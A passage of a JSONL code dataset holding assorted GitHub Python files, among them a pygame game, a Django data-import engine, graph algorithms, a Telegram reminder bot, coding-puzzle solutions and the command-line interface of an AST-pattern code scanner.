j1.vely=0\n if j2.rect.y > (ALTO - j2.rect.height):\n j2.rect.y = ALTO - j2.rect.height\n j2.vely=0\n if j1.rect.y < (0):\n j1.rect.y = 0\n j1.vely=0\n if j2.rect.y < (0):\n j2.rect.y = 0\n j2.vely=0\n\n for r in rivales:\n if r.rect.x > (ANCHO - r.rect.width):\n r.velx = r.velx*-1\n if r.rect.x <= 0:\n r.velx = r.velx*-1\n\n if r.temp<= 0:\n b = Bala([r.rect.x , r.rect.y ], SALMON)\n b.vely = 7\n balasR.add(b)\n b.temp = random.randrange(100)\n\n\n\n\n #Se usa para que el grupo \"balas\" cuando choque con rivales, los elimine\n #Si se pone False, en vez de true, no lo elimina\n #Ejemplo: cuando un jugador esta en fuego que se queme\n for b in balas:\n ls_col=pygame.sprite.spritecollide(b,rivales,True)\n for r in ls_col:\n #SI es True, cuenta cuantos cuadros a eliminado\n ptos+=1 #la ventaja aparece cuando se haya golpeado un enemigo\n\n ifVentaja = random.randrange(1000)\n if ifVentaja > 800:\n #crear ventaja\n v = Ventaja ([r.rect.x , r.rect.y ])\n ventajas.add(v)\n\n print (ptos)\n balas.remove(b)\n\n #Que sucede cuando el jugador toca una bala del rival? :\n\n for b in balasR:\n ls_col=pygame.sprite.spritecollide(b,jugadores,True)\n if j in ls_col:\n\n if j.vidas == 0:\n endGame = True\n else : # collide lo elimina de la pantalla , por eso debo hacerlo aparecer de nuevo\n if j.salud < 0:\n j.salud -= 1\n\n else : #si salud es menor a cero, se debe decrementar la cantidad de vidas que tiene el jugador\n vACtual= j.vidas -1\n j1 = Cuadro([100, 200] , VERDE)\n j1.vidas = vACtual\n jugadores.add(j1)\n \n\n\n for u in bomba:\n ls_col=pygame.sprite.spritecollide(u,rivales,True)\n for r in ls_col:\n bomba.remove(rivales)\n\n\n for j in jugadores:\n lsCap = pygame.sprite.spritecollide(j, ventajas, True)\n\n for v in lsCap:\n j.bombas += 1\n ventajas.remove(v)\n\n\n #limpieza\n for b in balas:\n if b.rect.y < -10:\n balas.remove(b)\n\n rivales.update()\n balas.update()\n bomba.update()\n ventajas.update()\n balasR.update()\n\n #refresca la pantala\n pantalla.fill(NEGRO)\n jugadores.draw(pantalla)\n rivales.draw(pantalla)\n balas.draw(pantalla)\n bomba.draw(pantalla)\n ventajas.draw(pantalla)\n pygame.display.flip()\n reloj.tick(60)\n\n\n","repo_name":"m3lissaeg/PythonPygame","sub_path":"game/gameDiego.py","file_name":"gameDiego.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5209283734","text":"# defining a function\ndef get_weekend_average_teap(temps):\n add = 0\n for temp in temps.values():\n add = add + temp\n avg = format(add / len(temps), '.2f')\n return avg\n\n\ntemp_val = {\"Sunday\": 21, \"Monday\": 22, \"Tuesday\": 25, \"Wednesday\": 23,\n \"Thursday\": 20, \"Friday\": 22, \"Saturday\": 28}\n# printing the average temperature\nprint(\"The avaerage weekend temperature is\", get_weekend_average_teap(temp_val))\n","repo_name":"Mayank-B01/Python-programming","sub_path":"Week 6/Workshop/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17228505011","text":"from django.contrib.contenttypes.models import ContentType\nimport datetime\n\nfrom contextlib import contextmanager\n@contextmanager\ndef fake_create_revision(*args,**kwargs):\n yield\n\ndef get_reversion_manager(disable_reversion):\n if disable_reversion:\n using_reversion = False\n create_revision = fake_create_revision\n else:\n try:\n import reversion as revisions\n using_reversion = True\n create_revision = revisions.create_revision\n except:\n using_reversion = False\n create_revision = fake_create_revision\n return using_reversion, create_revision\n\nclass DataImporter(object):\n def __init__(self, *args, **kwargs):\n self.failed = []\n self.skipped = []\n self.success = []\n\n self.file_defn = kwargs['file_defn']\n self.options = kwargs['options']\n self.stdout = kwargs['stdout']\n self.stderr = kwargs['stderr']\n self.debug_mode = kwargs['debug_mode']\n self.verbosity = int(self.options.get('verbosity',1))\n\n def skip_row(self, i, row, reason=\"\"):\n if self.verbosity>=2:\n self.stdout.write(\n \"Line {row} - skipped making model - {name} - {reason}\".format(\n reason=reason,\n row=i,\n name=self.import_name\n )\n )\n if self.verbosity==3:\n self.stdout.write('%s'%row)\n self.skipped.append(i)\n\n def get_model(self, requested_model=None):\n if requested_model is None:\n requested_model = self.file_defn['model']\n try:\n app_label,model = requested_model.lower().split('.',1)\n model = ContentType.objects.get(app_label=app_label,model=model).model_class()\n except ContentType.DoesNotExist:\n self.stderr.write(\"Model does not exist - %s\"%requested_model)\n return None\n return model\n\n def process_row(self, row, index):\n if self.file_defn.get('models', None):\n self.import_defns = self.file_defn['models']\n else:\n self.import_defns = [self.file_defn]\n\n for import_defn in self.import_defns:\n model = self.get_model(import_defn['model'])\n # self.stdout.write(\"importing file <%s> in as model <%s>\"%(filename,model))\n self.import_name = import_defn.get('import_name', \"\")\n self.process_row_imports(row, index, import_defn)\n\n def process_row_imports(self, row, index, import_defn):\n i = index\n model = self.get_model(import_defn['model'])\n values = {}\n try:\n if import_defn.get(\"condition\"):\n condition = import_defn[\"condition\"]['python']\n if not eval(condition):\n self.skip_row(i, row, \"condition not met\")\n return\n for f_name, f_details in import_defn['fields'].items():\n \n\n if type(f_details) not in [type({}), type([])]:\n values[f_name] = row[f_details]\n elif type(f_details) is type({}):\n if f_details['type'] == 'null_is_blank':\n val = row[f_details['field']]\n if val is None:\n val = \"\"\n values[f_name] = val\n if f_details['type'] == 'const':\n values[f_name] = f_details['value']\n if f_details['type'] == 'lookup':\n sub_model = self.get_model(f_details['model'])\n try:\n lookups = {}\n for f,v in f_details['fields'].items():\n if type(v) is str:\n lookups[f] = row[v]\n elif type(v) is dict:\n if v['type'] == \"const\":\n lookups[f] = v['value']\n elif v['type'] == \"python\":\n lookups[f] = eval(v['code'])\n values[f_name] = sub_model.objects.get(\n **lookups\n )\n except sub_model.DoesNotExist:\n if f_details.get('not_found', None) == 'null':\n values[f_name] = None\n elif f_details.get('not_found', None) == 'skip':\n self.skip_row(i, row, \"related model not found\")\n return\n else: #if f_details.get('not_found', None) != 'skip':\n raise\n\n if f_details['type'] == 'const_lookup':\n sub_model = self.get_model(f_details['model'])\n values[f_name] = sub_model.objects.get(\n **dict([\n (f,v) for f,v in f_details['fields'].items()\n ])\n )\n\n if f_details['type'] == 'python':\n script = f_details.get('code')\n get_model = lambda x: self.get_model(x)\n value = eval(script)\n values[f_name] = value\n\n if f_details['type'] == 'coded':\n mapping = f_details['choices']\n default = mapping.pop('__unknown__', None)\n values[f_name] = mapping.get(row[f_details['value']], default)\n \n if f_details['type'] == 'date':\n val = row[f_details['value']]\n try:\n values[f_name] = datetime.datetime.strptime(val,f_details['date_format']).date()\n except:\n values[f_name] = None\n\n if self.debug_mode:\n print(values)\n\n if import_defn.get('database', {}).get(\"key\"):\n # If the spec defines a lookup key to match this row against\n keys = import_defn.get('database', {}).get(\"key\")\n lookup_vals = {}\n if type(keys) is str:\n keys = [keys]\n for key in keys:\n lookup_vals[key] = values.pop(key)\n lookup_vals['defaults']=values\n obj,created = model.objects.update_or_create(**lookup_vals)\n else:\n obj,created = model.objects.get_or_create(**values)\n\n if import_defn.get('after_create'):\n was_created = created\n this = obj\n row = row\n get_model = lambda x: self.get_model(x)\n\n script = import_defn.get('after_create').get('python')\n if script:\n try:\n exec(script)\n except:\n pass\n\n\n if self.options.get('force_create', False):\n created = True\n if created:\n self.success.append(i)\n else:\n self.skip_row(i, row, \"already exists\")\n except Exception as e:\n if self.verbosity >=2:\n self.stderr.write(\"Line %s - %s\"%(i,e))\n if self.debug_mode:\n raise\n self.failed.append(i)\n # end transaction\n","repo_name":"LegoStormtroopr/django-data-importer","sub_path":"data_importer/importers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3845542644","text":"'''\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n'''\n\ndef smallestMultiple(n):\n num = n\n while True:\n div = True\n for x in range(1, n+1):\n if num % x != 0:\n div = False\n if not div:\n num += 1\n else:\n return num\n\nimport math\n\ndef smallestMultiple2(n):\n result = 1\n for x in range(1, n+1):\n result *= x // math.gcd(x, result)\n return result\n\nprint(smallestMultiple2(10))\nprint(smallestMultiple2(20))\n","repo_name":"rahulpoptani/Python-Playground","sub_path":"CodingPlatform/ProjectEuler/005_SmallestMultiple.py","file_name":"005_SmallestMultiple.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5460847290","text":"from dataclasses import dataclass\n\n@dataclass\nclass User:\n name: str\n is_active: bool\n is_foreign: bool\n language : str\n\n def say_hello(self, message):\n print(message)\n\n # Decompose conditional in methods\n def validate_user(self):\n accepted_age = range(18, 25)\n\n if not self.age in accepted_age:\n raise ValueError(\"You can not be my colleague\")\n\n if not self.is_active:\n raise ValueError(\"Inactive user\")\n\n\ndef international_hello(self, user: User, language: str):\n available_languages = [\"spanish\", \"english\", \"italian\"]\n colleagues = [\"Manolo\", \"Cherryl\", \"Luigi\"]\n\n # Call decompose method\n user.validate_user()\n\n #Guard Clause for language not found\n if language not in available_languages:\n print(\"Language not Found\")\n\n for colleague in colleagues:\n #Guard Clause for is_foreign user\n if not user.is_foreign:\n greeting = \"hi\"\n\n if language == \"spanish\": \n greeting = \"hola\"\n if language == \"english\":\n greeting = \"hi\"\n if language == \"italian\":\n greeting = \"hi\"\n \n # Consolidate duplicades\n user.say_hello(f\"{greeting} {colleague}\")","repo_name":"pacocampo/arrow_code_antipattern","sub_path":"arrow_code/refactor/3_decompose.py","file_name":"3_decompose.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45005375206","text":"from Utils.utils import *\nfrom UserBot.bot import bot\nfrom config import CLIENT_TOKEN\nfrom UserBot.templates import package_size_end_soon_template, package_days_expire_soon_template\ntry:\n bot.remove_webhook()\nexcept:\n pass\n\nsettings = all_configs_settings()\nALERT_PACKAGE_GB = settings.get('reminder_notification_usage', 3)\nALERT_PACKAGE_DAYS = settings.get('reminder_notification_days', 3)\n\n\ndef alert_package_gb(package_remaining_gb):\n if package_remaining_gb <= ALERT_PACKAGE_GB:\n return True\n return False\n\n\ndef alert_package_days(package_remaining_days):\n if package_remaining_days <= ALERT_PACKAGE_DAYS:\n return True\n return False\n\n\n# Send a reminder to users about their packages\ndef cron_reminder():\n if not CLIENT_TOKEN:\n return\n if not settings['reminder_notification']:\n return\n\n telegram_users = USERS_DB.select_users()\n if telegram_users:\n for user in telegram_users:\n user_telegram_id = user['telegram_id']\n user_subscriptions_list = non_order_user_info(user_telegram_id) + order_user_info(user_telegram_id)\n if user_subscriptions_list:\n for user_subscription in user_subscriptions_list:\n package_days = user_subscription.get('remaining_day', 0)\n package_gb = user_subscription.get('usage', {}).get('remaining_usage_GB', 0)\n sub_id = user_subscription.get('sub_id')\n if package_days == 0:\n continue\n if alert_package_gb(package_gb):\n bot.send_message(user_telegram_id, package_size_end_soon_template(sub_id, package_gb))\n if alert_package_days(package_days):\n bot.send_message(user_telegram_id, package_days_expire_soon_template(sub_id, package_days))\n","repo_name":"B3H1Z/Hiddify-Telegram-Bot","sub_path":"Cronjob/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"76"} +{"seq_id":"7625936692","text":"from cola import Cola\nfrom pila import Pila\nimport random\n\n\n'''\nRecibe un grafo y un vertice de origen y recorre todos los vertices \nposibles a partir del origen que pertenezcan a niveles inferiores o iguales\nal dado por parametro. Devuelve un diccionario con los padres de cada\nvertice recorrido.\n'''\ndef bfs_por_nivel(grafo, origen, nivel):\n visitados = set()\n padres = {}\n orden = {}\n q = Cola()\n v = origen\n visitados.add(v)\n padres[v] = None\n orden[v] = 0\n q.encolar(v)\n while not q.esta_vacia():\n v = q.desencolar()\n for w in grafo.adyacentes(v):\n if w not in visitados:\n orden[w] = orden[v] + 1\n if orden[w] == nivel + 1:\n break\n visitados.add(w)\n padres[w] = v\n q.encolar(w)\n return padres\n\n'''\nRecibe un grafo y dos vertices. Recorre el camino minimo\nen cantidad de aristas desde el vertice de origen hasta el\nvertice de destino. Devuelve el camino desde el origen\nhasta el destino. Si no hay camino devuelve None.\n'''\n\ndef camino_bfs(grafo, origen, des):\n visitados = set()\n padres = {}\n camino = []\n q = Cola()\n visitados.add(origen)\n padres[origen] = None\n q.encolar(origen)\n while not q.esta_vacia():\n v = q.desencolar()\n if v == des:\n break\n for w in grafo.adyacentes(v):\n if w not in visitados:\n visitados.add(w)\n padres[w] = v\n q.encolar(w)\n\n if des not in visitados:\n return None\n v = des\n while v != None:\n camino.insert(0, v)\n v = padres[v]\n return camino\n\n'''\nRecibe un grafo. Devuelve los grados de salida\npara cada vertice en forma de diccionario. En caso de ser\nno dirigido simplemente devuelve los grados.\n'''\ndef grados_salida(grafo):\n grados = {}\n for v in grafo:\n grados[v] = len(grafo.adyacentes(v))\n return grados\n \n'''\nFuncion recursiva de cfc.\n'''\n\ndef _cfc(grafo, v, mb, orden, visitados, apilados, pila, orden_global, componentes):\n visitados.add(v)\n apilados.add(v)\n pila.apilar(v)\n mb[v] = orden[v] = orden_global\n orden_global += 1\n \n for w in grafo.adyacentes(v):\n if w not in visitados:\n orden_global = _cfc(grafo, w, mb, orden, visitados, apilados, pila, orden_global, componentes)\n if w in apilados:\n if mb[w] < mb[v]:\n mb[v] = mb[w]\n\n if mb[v] == orden[v] and (not pila.esta_vacia()):\n nueva_cfc = []\n while True:\n w = pila.desapilar()\n apilados.remove(w)\n nueva_cfc.append(w)\n if w == v:\n break\n componentes.append(nueva_cfc)\n\n return orden_global\n\n'''\nRecibe un grafo. Calcula sus componentes fuertemente conexas y las devuelve.\n'''\n\ndef cfc(grafo):\n apilados = set()\n visitados = set()\n pila = Pila()\n orden = {}\n mb = {}\n componentes = []\n or_glo = 0\n for v in grafo:\n if v not in visitados:\n or_glo = _cfc(grafo,v,mb,orden,visitados,apilados,pila,or_glo,componentes)\n return componentes\n\n\n'''\nRecibe un grafo. Calcula y devuelve las comunidades del mismo.\n(vertices altamente conectados entre si).\n'''\ndef label_propagation(grafo):\n labels = {}\n comunidades = {}\n i = 0\n\n for v in grafo:\n labels[v] = i\n i += 1\n \n i = 0 \n while i != 10:\n i += 1\n comunidades = {}\n vertices =grafo.obtener_vertices()\n random.shuffle(vertices)\n \n for v in vertices:\n freq = {}\n for w in grafo.adyacentes(v):\n if labels[w] not in freq:\n freq[labels[w]] = 1\n else:\n freq[labels[w]] += 1\n\n max = 0\n clave = None\n for key in freq:\n if freq[key] > max:\n max = freq[key]\n clave = key\n \n labels[v] = clave\n\n for v in labels:\n if labels[v] not in comunidades:\n comunidades[labels[v]] = []\n comunidades[labels[v]].append(v)\n \n return comunidades\n\n'''\nRecibe un grafo y devuelve los vertices de entrada\npara cada vertice del mismo.\n'''\ndef vertices_entrada(grafo):\n v_entrada = {}\n for v in grafo:\n if v not in v_entrada:\n v_entrada[v] = set()\n\n for w in grafo.adyacentes(v):\n if w not in v_entrada:\n v_entrada[w] = set()\n\n v_entrada[w].add(v)\n return v_entrada\n \n'''\nRecibe un grafo y calcula un ranking de importancia para cada vertice dentro\ndel grafo. Devuelve ese ranking en forma de diccionario.\n'''\n\ndef page_rank(grafo):\n pr = {}\n cant = len(grafo.obtener_vertices())\n for v in grafo:\n pr[v] = 1 / cant\n \n entrada = vertices_entrada(grafo)\n \n new_pr = {}\n for i in range(50): #cantidad de iteraciones para converger\n for v in grafo:\n new_pr[v] = (1 - 0.85) / cant\n visitados = set()\n for w in entrada[v]:\n if w == v:\n continue\n new_pr[v] += 0.85 * (pr[w] / len(grafo.adyacentes(w)))\n pr = new_pr\n new_pr = {}\n \n return pr\n\n\n'''\nFuncion recursiva para calcular ciclo de largo n.\n'''\ndef _dfs_ciclo_largo_n(grafo, v, origen, n, visitados, camino_actual):\n camino_actual.append(v)\n visitados.add(v)\n if len(camino_actual) == n:\n if origen in grafo.adyacentes(v):\n camino_actual.append(origen)\n return camino_actual\n else:\n camino_actual.pop()\n visitados.remove(v)\n return None\n \n for w in grafo.adyacentes(v):\n if w not in visitados:\n solucion = _dfs_ciclo_largo_n(grafo, w, origen, n, visitados, camino_actual)\n if solucion is not None:\n return solucion\n camino_actual.pop()\n visitados.remove(v)\n return None\n\n\n\n'''\nRecibe un grafo y un vertice. Busca un camino simple que tenga longitud\nn y empiece y termine en el vertice dado. De no encontrar el camino \ndevuelve None.\n'''\ndef ciclo_largo_n(grafo, origen ,n):\n return _dfs_ciclo_largo_n(grafo, origen , origen,n, set(), [])\n ","repo_name":"bertichelucas/Algoritmos-y-Programacion-II","sub_path":"TP3/funciones_grafos.py","file_name":"funciones_grafos.py","file_ext":"py","file_size_in_byte":6308,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2057580277","text":"import os,re,sys,shutil\nfrom random import randrange\nfrom shutil import copyfile\n\ndef main(oldroot,newroot):\n if (not os.path.exists(oldroot)):\n return\n if(os.path.exists(newroot)):\n shutil.rmtree(newroot)\n for root, dirs, files in os.walk(oldroot):\n substr = re.sub(oldroot, '', root)\n curroot = newroot + substr\n os.mkdir(curroot)\n if files:\n nofiles = int(len(files) / 10)\n while nofiles != 0:\n randomnum = randrange(0, len(files))\n copyfile(root + '/' + files[randomnum], curroot + '/' + files[randomnum])\n files.pop(randomnum)\n nofiles -= 1\n\nif __name__ == '__main__':\n oldroot=sys.argv[1]\n newroot=sys.argv[2]\n main(oldroot,newroot)","repo_name":"adarshsuresh/Python","sub_path":"Perceptron/DataGenerator10.py","file_name":"DataGenerator10.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16437265857","text":"# !/usr/bin/env python\n# _*_coding:utf-8 _*_\n# @Time : 2023/5/26 14:34\n# @Author : yufeng.wang@we-med.com\n# @Site :\n# @File : addProductKindPage.py\n# @Software : PyCharm\nimport time\n\nfrom common.basePage import BasePage\n\n\nclass AddProductKindPage(BasePage):\n \"\"\"\n 添加商品分类\n \"\"\"\n\n def add_product_kind(self, kind_name, kind_idx, number, show, show_navigation, show_home_page, action=None):\n \"\"\"\n 添加商品分类\n :param kind_name:分类名称\n :param kind_idx:上级分类\n :param number:数量\n :param show:是否展示\n :param show_navigation:是否展示在导航栏\n :param show_home_page:是否展示在主页\n :param action:\n :return:\n \"\"\"\n # 输入分类名称\n time.sleep(2)\n self.input_text(self.cate_name_input, kind_name)\n # 点击上级分类\n self.click(self.kind_select)\n # 选择上级分类\n self.kind_select_idx[-1] = self.kind_select_idx[-1].replace(\"%s\", kind_idx)\n # 数量单位\n self.input_text(self.number_input, number)\n # 是否显示\n self.is_show[-1] = self.is_show[-1].replace(\"%s\", show)\n self.click(self.is_show)\n # 是否展示导航栏\n self.is_show_navigation[-1] = self.is_show_navigation[-1].replace(\"%s\", show_navigation)\n self.click(self.is_show_navigation)\n # 是否展示在首页\n self.is_show_home_page[-1] = self.is_show_home_page[-1].replace(\"%s\", show_home_page)\n self.click(self.is_show_home_page)\n self.click(self.submit_btn)\n self.click(self.primary_submit_btn)\n","repo_name":"wangyufeng-github/web-autotest","sub_path":"pageObjects/productManage/addProductKindPage.py","file_name":"addProductKindPage.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"75119886644","text":"import telebot\nimport os\nfrom telebot.types import Message\n\nfrom src.utils.config import Config\n\n# run this bot and type /id to get chat id for \"config.json\"'s \"telegram_chat_id_list\"\n\nif __name__ == \"__main__\":\n config_path = os.path.abspath(os.path.join(\"..\", \"..\", \"..\", \"config.json\"))\n bot = telebot.TeleBot(Config(config_path).telegram_token)\n\n @bot.message_handler(commands=[\"id\"])\n def echo_message(message: Message):\n repl = \"Chat ID: \" + str(message.chat.id) + \"\\n\"\n repl += \"User ID: \" + str(message.from_user.id) + \"\\n\"\n bot.send_message(message.chat.id, repl, disable_notification=True)\n bot.delete_message()\n\n bot.infinity_polling()\n","repo_name":"StillMonad/DiscordMonitoringBot","sub_path":"src/utils/telegram_helper_bot/telegram_bot_main.py","file_name":"telegram_bot_main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11900327998","text":"def prepare(data):\n coordinates = set()\n max_row = 0\n max_column = 0\n\n for line in data:\n r, c = map(int, line.split(\", \"))\n coordinates.add((r, c))\n max_row = max(max_row, r)\n max_column = max(max_column, c)\n return coordinates, max_column, max_row\n\n\ndef main(data, manhattan_limit=10000):\n coordinates, max_row, max_column = prepare(data)\n region_size = 0\n\n for i in range(max_row + 1):\n for j in range(max_column + 1):\n region_size += int(sum(abs(r - i) + abs(c - j) for r, c in coordinates) < manhattan_limit)\n\n return region_size\n\n\nif __name__ == '__main__':\n print(main([line.strip() for line in open('data.txt').readlines()]))\n","repo_name":"ypankovych/Advent-of-Code-2018","sub_path":"Day 6 Chronal Coordinates/Part Two/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18308983934","text":"class Solution:\n def findCriticalAndPseudoCriticalEdges(self, n: int, edges: List[List[int]]) -> List[List[int]]:\n critical = []\n pseudo = []\n\n def cal(list1, skip):\n res = 0\n father = [i for i in range(n)]\n\n def find(x):\n if x == father[x]:\n return x\n father[x] = find(father[x])\n return father[x]\n\n def union(x, y):\n fa1 = find(x)\n fa2 = find(y)\n if fa1 != fa2:\n father[fa1] = fa2\n\n for i, (x, y, weight, _) in enumerate(list1):\n if i == skip:\n continue\n if find(x) != find(y):\n res += weight\n union(x, y)\n\n for i in range(n):\n if find(i) != find(0):\n return float('inf')\n\n return res\n\n for i in range(len(edges)):\n edges[i].append(i)\n edges.sort(key=lambda x: x[2])\n mst = cal(edges, -1)\n for i in range(len(edges)):\n if cal(edges, i) > mst:\n critical.append(edges[i][3])\n else:\n edges = [edges[i][::]] + edges\n if cal(edges, -1) == mst:\n pseudo.append(edges[i + 1][3])\n edges = edges[1:]\n\n return [critical, pseudo]\n","repo_name":"jiangruofan/algorithm","sub_path":"1489. Find Critical and Pseudo-Critical Edges in Minimum Spanning Tree.py","file_name":"1489. Find Critical and Pseudo-Critical Edges in Minimum Spanning Tree.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72566402485","text":"import datetime\nimport os\n\nfrom . import visitors\nfrom .common import Colors, Log\nfrom .scanner import Scanner\n\n\n# CLI interface\nclass Interface:\n PARAMS = {\n \"arg_string\": {\"args\": [\"-a\", \"--args\"], \"value\": True, \"default\": \"\", \"help\": \"Arguments for method\"},\n \"help\": {\"args\": [\"-h\", \"--help\"], \"value\": False, \"help\": \"Show help and exit\"},\n \"extensions\": {\"args\": [\"-e\", \"--extensions\"], \"value\": True, \"default\": \"py\", \"help\": \"Extensions to process\"},\n \"grepable\": {\"args\": [\"-g\", \"--grepable\"], \"value\": False, \"help\": \"Make results easier to grep\"},\n \"no_colors\": {\"args\": [\"-c\", \"--no-colors\"], \"value\": False, \"help\": \"Don't print colors\"},\n \"no_source\": {\"args\": [\"-n\", \"--no-source\"], \"value\": False, \"help\": \"Don't print source code\"},\n \"path\": {\"args\": [\"-p\", \"--path\"], \"value\": True, \"default\": \".\", \"help\": \"Starting directory\"},\n \"skip\": {\"args\": [\"-s\", \"--skip\"], \"value\": True, \"default\": \"tests\", \"help\": \"Paths to skip\"},\n }\n\n def __init__(self, args):\n self.args = []\n self.name = args[0]\n self.method = None\n self.visitors = {}\n\n # Load visitors\n for name in dir(visitors):\n if name.startswith(\"Visitor\"):\n visitor = getattr(visitors, name)\n if visitor.NAME:\n self.visitors[visitor.NAME] = visitor\n\n # Allow multiple short arguments in same argument\n for arg in args[1:]:\n if len(arg) > 1 and arg[0] == \"-\" and arg[1] != \"-\":\n self.args += [f\"-{x}\" for x in arg[1:]]\n else:\n self.args.append(arg)\n\n self.configure()\n\n self.clr = Colors(self.no_colors or os.environ.get(\"NO_COLOR\", False))\n self.log = Log(self.clr)\n\n if self.help or self.method is None:\n self.print_help()\n\n self.scanner_config = {\n \"extensions\": self.extensions.split(\",\"),\n \"skip\": self.skip.split(\",\"),\n \"grepable\": self.grepable,\n \"print_source\": not self.no_source,\n \"visitor_configs\": self.get_visitor_configs(),\n }\n\n def get_visitor_config(self, method, arg_string):\n if method in self.visitors:\n visitor = self.visitors[method]\n else:\n self.log.error(f'Unknown method \"{method}\"')\n\n visitor_args, visitor_kwargs = self.parse_visitor_args(arg_string)\n return {\n \"visitor\": visitor,\n \"args\": visitor_args,\n \"kwargs\": visitor_kwargs,\n }\n\n def get_visitor_configs(self):\n visitor_configs = []\n\n if self.method == \"file\":\n # Configure visitors from file\n try:\n with open(self.arg_string, \"r\") as f:\n lines = [line.strip() for line in f.readlines()]\n except Exception as e:\n self.log.error(f'Error reading \"{self.arg_string}\": {e}')\n\n for line in lines:\n if not line or line.startswith(\"#\"):\n continue\n\n if \":\" in line:\n method, arg_string = line.strip().split(\":\", 1)\n else:\n method, arg_string = line, \"\"\n\n visitor_configs.append(self.get_visitor_config(method.strip(), arg_string.strip()))\n else:\n # Configure visitors from CLI arguments\n visitor_configs.append(self.get_visitor_config(self.method, self.arg_string))\n\n return visitor_configs\n\n def configure(self):\n param = None\n\n for key, value in self.PARAMS.items():\n setattr(self, key, value.get(\"default\", False))\n\n for arg in self.args:\n if param is not None:\n setattr(self, param, arg)\n param = None\n continue\n\n found = False\n\n for key, value in self.PARAMS.items():\n if arg in value[\"args\"]:\n if value[\"value\"]:\n param = key # Parameter takes value\n found = True\n else:\n setattr(self, key, True) # Parameter is a flag\n found = True\n\n if not found:\n if self.method is None:\n self.method = arg\n else:\n self.help = True\n\n def f(self, string, length):\n if len(string) > length:\n return string[: length - 3] + \"...\"\n else:\n return string + \" \" * (length - len(string))\n\n def parse_visitor_args(self, arg_string):\n args, kwargs = [], {}\n\n for arg in arg_string.split(\",\"):\n arg = arg.strip()\n if not arg:\n continue\n\n parts = arg.split(\"=\", 1)\n\n if len(parts) == 1:\n args.append(parts[0])\n else:\n kwargs[parts[0]] = parts[1]\n\n return args, kwargs\n\n def print_help(self):\n methods, params, usage = ([], []), [], []\n\n for method in sorted(self.visitors.keys()):\n visitor = self.visitors[method]\n args = \" ({})\".format(\", \".join(visitor.ARGS)) if visitor.ARGS else \"\"\n group = 0 if visitor.COMMON else 1\n methods[group].append(f\" {method:25} {visitor.HELP}{args}\")\n\n for x in self.PARAMS.values():\n param = \" \" if x[\"value\"] else \"\"\n usage.append(f'[{x[\"args\"][0]}{param}]')\n params.append(\" {:25} {}\".format(f'{x[\"args\"][0]}|{x[\"args\"][1]}{param}', x[\"help\"]))\n\n print(\n \"\\n\".join(\n [\n \"Astvuln: Search Python code for AST patterns.\",\n \"Usage: {}\".format(\"\".join(usage)),\n \"\\nOptions:\\n{}\".format(\"\\n\".join(params)),\n \"\\nCommon methods:\\n{}\".format(\"\\n\".join(methods[0])),\n \"\\nCustom methods:\\n{}\".format(\"\\n\".join(methods[1])),\n \"\\nReading methods from file:\",\n ' Run method \"file\" and pass filename in method arguments to run multiple methods in a single run.',\n \" Each method needs to be specified in a single line and colon-seperated from arguments.\",\n ' E. g. \"./astvuln foo -a bar,baz\" would be translated to:',\n \" foo:bar,baz\",\n \"\\nExamples:\",\n \" ./astvuln -h # Print help\",\n \" ./astvuln print -c # Run method `print` without color output\",\n \" ./astvuln dump -p dir # Run method `dump` on directory `dir`\",\n \" ./astvuln call -a bytes # Run method `call` with argument `bytes`\",\n \" ./astvuln foo -a a=1,b=2 # Run method `foo` with arguments a = 1 and b = 2\",\n \" ./astvuln file -a methods.txt # Run multiple methods specified in a file\",\n ]\n )\n )\n\n exit()\n\n def print_greeting(self):\n conf = self.scanner_config\n flags = []\n\n if self.log.clr.no_colors:\n flags.append(\"no colors\")\n if conf[\"grepable\"]:\n flags.append(\"grepable\")\n\n greeting = [\n \"+---------------------------------[ astvuln ]---------------------------------+\",\n \"| Date: {} |\".format(self.f(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 63)),\n \"| Path: {} |\".format(self.f(self.path, 63)),\n \"| Extensions: {} |\".format(self.f(\", \".join(conf[\"extensions\"]), 63)),\n \"| Skip: {} |\".format(self.f(\", \".join(conf[\"skip\"]), 63)),\n \"| Flags: {} |\".format(self.f(\", \".join(flags), 63)),\n \"+-----------------------------------------------------------------------------+\",\n ]\n\n for visitor_config in conf[\"visitor_configs\"]:\n greeting += [\n \"| Method: {} |\".format(self.f(visitor_config[\"visitor\"].NAME, 63)),\n \"| {} |\".format(self.f(visitor_config[\"visitor\"].HELP, 63)),\n \"| Params: {} |\".format(self.f(\", \".join(visitor_config[\"visitor\"].ARGS), 63)),\n \"| Args: {} |\".format(self.f(\", \".join(visitor_config[\"args\"]), 63)),\n \"| Kwargs: {} |\".format(\n self.f(\", \".join([f\"{k}={v}\" for k, v in 